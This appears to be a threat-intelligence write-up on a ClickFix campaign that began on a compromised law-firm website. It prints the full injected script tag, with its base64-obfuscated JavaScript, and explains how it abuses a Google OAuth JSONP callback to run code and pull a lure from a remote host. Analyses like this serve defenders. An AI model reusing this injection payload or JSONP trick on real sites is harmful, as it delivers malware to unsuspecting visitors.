Intel Reconfig Manager Exploited via DLL Sideloading

Sat, 11 Apr 2026 00:00:00 +0000

Intel Reconfig Manager Exploited via DLL Sideloading

ClickFix Attack Chain

This incident began with ClickFix (Like they all do these days).

The domain mnnursinghomelaw[.]com was compromised and serving a standard ClickFix lure.

The injected code used Reflected XSS to load the ClickFix page.

<script id="A9TNB8" src="https://accounts.google.com/o/oauth2/revoke?callback=Function(atob(%27CiAgICBsZXQgYkFib3J0ID0gZmFsc2U7CiAgICBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdtb3VzZW1vdmUnLCAoZSkgPT4gewogICAgICAgIGlmKGJBYm9ydCkgcmV0dXJuOwogICAgICAgIChmdW5jdGlvbiAoZCwgdywgbywgdSwgbiwgcykgeyAgIC8vY29uc29sZS5sb2coJ2dzdicsIGdzdik7IGNvbnNvbGUubG9nKCd2ZXJtJywgdmVybSk7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coJ2dzdiA9ICcsIGdzdik7CiAgICAgICAgICAgIGlmICghc2Vzc2lvblN0b3JhZ2VbImdzX2xvIl0gfHwgc2Vzc2lvblN0b3JhZ2VbIl9fc3luY19sb2FkIl0gPT09ICJvbmNlIikgcmV0dXJuOwogICAgICAgICAgICBjb25zdCBzdHlsZSA9IGQuY3JlYXRlRWxlbWVudCgic3R5bGUiKTsKICAgICAgICAgICAgc3R5bGUudGV4dENvbnRlbnQgPSAiQGtleWZyYW1lcyBmYWRlSW57ZnJvbXtvcGFjaXR5OjB9dG97b3BhY2l0eToxfX1ib2R5e29wYWNpdHk6MDthbmltYXRpb246MXMgZWFzZS1pbi1vdXQgMXMgZm9yd2FyZHMgZmFkZUlufSI7CiAgICAgICAgICAgIGQuaGVhZC5hcHBlbmRDaGlsZChzdHlsZSk7CiAgICAgICAgICAgIHZhciBkYXRhID0geyBob3N0OiBkLmxvY2F0aW9uLmhvc3QsIG5vdzogRGF0ZS5ub3coKSB9OwogICAgICAgICAgICBzID0gZC5jcmVhdGVFbGVtZW50KG8pOwogICAgICAgICAgICBzLmFzeW5jID0gMTsgcy5zcmMgPSB1ICsgIj9kYXRhPSIgKyBlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkoZGF0YSkpOwogICAgICAgICAgICBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQocyk7CiAgICAgICAgfSkoZG9jdW1lbnQsIHdpbmRvdywgInNjcmlwdCIsIGF0b2IoImFIUjBjSE02THk5c2FYTjBMbTFsZEdGdFpYUnlhV056TG01bGRDOCIpICsgYXRvYigiWjJWdmRHUjJNbWx1YzNSaGJuUXVjR2h3IikpOwogICAgICAgIGxldCBlbFMgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQTlUTkI4Iik7CiAgICAgICAgZWxTICYmIChlbFMucmVtb3ZlKCkpOwogICAgfSwgeyBvbmNlOiB0cnVlIH0pOwo%27))"></script>

The response from accounts.google.com/o/oauth2/revoke lists the function as the first item, which causes the <script> tag to parse and execute it.

// API callback
Function(atob('CiA...Owo'))({
    "error": {
        "code": 400,
        "message": "Invalid JSONP callback name: 'Function(atob('CiA...Owo'))'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
        "status": "INVALID_ARGUMENT"
    }
});

This script decodes to an event listener that looks for a mousemove event. When detected, it decodes a URL and pulls the ClickFix lure.

Amadey on Alert Overload

Intel Reconfig Manager Exploited via DLL Sideloading

Intel Reconfig Manager Exploited via DLL Sideloading

ClickFix Attack Chain